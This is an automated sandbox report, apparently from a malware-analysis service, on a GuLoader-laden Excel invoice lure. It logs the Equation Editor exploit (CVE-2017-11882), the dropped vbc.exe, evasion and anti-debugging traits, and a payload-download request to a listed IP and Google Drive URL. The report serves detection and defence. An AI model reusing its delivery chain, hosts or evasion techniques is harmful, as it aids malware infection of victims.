Windows Analysis Report Invoice Scan Copy.xlsx

Overview

General Information

Sample Name: Invoice Scan Copy.xlsx
Analysis ID: 482507
MD5: 026c63b9e090a6bf86cc8b6a4549290a
SHA1: 39fa74d1c7de05c25466cb057ba984ec08c0848b
SHA256: 6e6e60afa39ac72cca4e828ef18e8650105635cea693048061483b7e44f60497
Tags: VelvetSweatshopxlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.688308642.00000000003F0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1lbI6ot82pXs)"}
Multi AV Scanner detection for submitted file
Source: Invoice Scan Copy.xlsx ReversingLabs: Detection: 25%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov edx, 31108335h 6_2_00401500
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00401500
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov edx, 31108335h 6_2_0040285A
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_0040285A
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402C37
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_004028E2
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402CBF
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402D4E
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402DC9
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402E4B
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402A14
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402EDD
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402A97
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402F51
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402B19
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov edx, 31108335h 6_2_004027D8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_004027D8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402B9A
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.141.149:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.141.149:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 69MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2019696 ET TROJAN Possible MalDoc Payload Download Nov 11 2014 192.168.2.22:49165 -> 192.3.141.149:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1lbI6ot82pXs)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Sep 2021 18:46:06 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10Last-Modified: Sun, 12 Sep 2021 19:01:15 GMTETag: "1c000-5cbd0f90d4415"Accept-Ranges: bytesContent-Length: 114688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /monday/bin.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.149Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 38D58F94.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D58F94.emf

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editingfrom the 17 . . yellow bar above This document is 18 I! T a protected 3. Once you h
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401500 6_2_00401500
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040285A 6_2_0040285A
Source: C:\Users\Public\vbc.exe Code function: 6_2_004028E2 6_2_004028E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402A14 6_2_00402A14
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402A97 6_2_00402A97
Source: C:\Users\Public\vbc.exe Code function: 6_2_004027D8 6_2_004027D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6429 6_2_003F6429
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9039 6_2_003F9039
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6433 6_2_003F6433
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3430 6_2_003F3430
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F582D 6_2_003F582D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003FA02B 6_2_003FA02B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9220 6_2_003F9220
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F621F 6_2_003F621F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3218 6_2_003F3218
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F7E13 6_2_003F7E13
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F520E 6_2_003F520E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F2272 6_2_003F2272
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F304A 6_2_003F304A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F42B9 6_2_003F42B9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F08B8 6_2_003F08B8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F98A2 6_2_003F98A2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9888 6_2_003F9888
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9880 6_2_003F9880
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F22FF 6_2_003F22FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F06E2 6_2_003F06E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F52D0 6_2_003F52D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9735 6_2_003F9735
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F8330 6_2_003F8330
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F4F28 6_2_003F4F28
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9518 6_2_003F9518
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F717B 6_2_003F717B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F4B7A 6_2_003F4B7A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F4F78 6_2_003F4F78
Source: C:\Users\Public\vbc.exe Code function: 6_2_003FA771 6_2_003FA771
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3562 6_2_003F3562
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F895A 6_2_003F895A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F8F46 6_2_003F8F46
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9146 6_2_003F9146
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F01B7 6_2_003F01B7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F29A3 6_2_003F29A3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F419F 6_2_003F419F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F0B97 6_2_003F0B97
Source: C:\Users\Public\vbc.exe Code function: 6_2_003FAB91 6_2_003FAB91
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F5DFB 6_2_003F5DFB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F45F5 6_2_003F45F5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F53EA 6_2_003F53EA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F47E2 6_2_003F47E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3DDD 6_2_003F3DDD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F2DD0 6_2_003F2DD0
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6429 NtAllocateVirtualMemory, 6_2_003F6429
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6433 NtAllocateVirtualMemory, 6_2_003F6433
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: bin[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: Invoice Scan Copy.xlsx ReversingLabs: Detection: 25%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Invoice Scan Copy.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF601.tmp
Source: classification engine Classification label: mal100.troj.expl.winXLSX@4/21@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.688308642.00000000003F0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405C6C push cs; iretd 6_2_00405C6E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405026 push ss; retf 6_2_00405117
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407830 pushfd ; iretd 6_2_0040783B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040410D push cs; iretd 6_2_0040410E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405118 push ss; retf 6_2_00405137
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403DC2 push ss; retf 6_2_00403DC3
Source: C:\Users\Public\vbc.exe Code function: 6_2_004095EE push edi; retf 6_2_004095EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_004055A1 push cs; iretd 6_2_004055A2
Source: C:\Users\Public\vbc.exe Code function: 6_2_004086FC push cs; retf 6_2_00408714
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404AB2 pushfd ; retf 6_2_00404AB3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403B71 pushfd ; iretd 6_2_00403B73
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407719 push edx; ret 6_2_00407724
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040532C pushad ; ret 6_2_004053CE
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405F32 push ecx; retf 6_2_00405F33
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405BC5 push cs; iretd 6_2_00405BC6
Source: C:\Users\Public\vbc.exe Code function: 6_2_004093E9 push cs; iretd 6_2_004093EA
Source: C:\Users\Public\vbc.exe Code function: 6_2_004033F1 push ss; ret 6_2_004033F4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F0058 push edx; ret 6_2_003F005B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F00BA push edx; ret 6_2_003F00BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6384 push ebp; ret 6_2_003F6387

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184 Thread sleep time: -300000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F8D84 rdtsc 6_2_003F8D84

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F8D84 rdtsc 6_2_003F8D84
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401500 mov ebx, dword ptr fs:[00000030h] 6_2_00401500
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040285A mov ebx, dword ptr fs:[00000030h] 6_2_0040285A
Source: C:\Users\Public\vbc.exe Code function: 6_2_004027D8 mov ebx, dword ptr fs:[00000030h] 6_2_004027D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F882F mov eax, dword ptr fs:[00000030h] 6_2_003F882F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6025 mov eax, dword ptr fs:[00000030h] 6_2_003F6025
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3218 mov eax, dword ptr fs:[00000030h] 6_2_003F3218
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9735 mov eax, dword ptr fs:[00000030h] 6_2_003F9735
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F8178 mov eax, dword ptr fs:[00000030h] 6_2_003F8178
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3DDD mov eax, dword ptr fs:[00000030h] 6_2_003F3DDD

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.688494156.0000000000920000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.688494156.0000000000920000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.688494156.0000000000920000.00000002.00020000.sdmp Binary or memory string: Program Manager<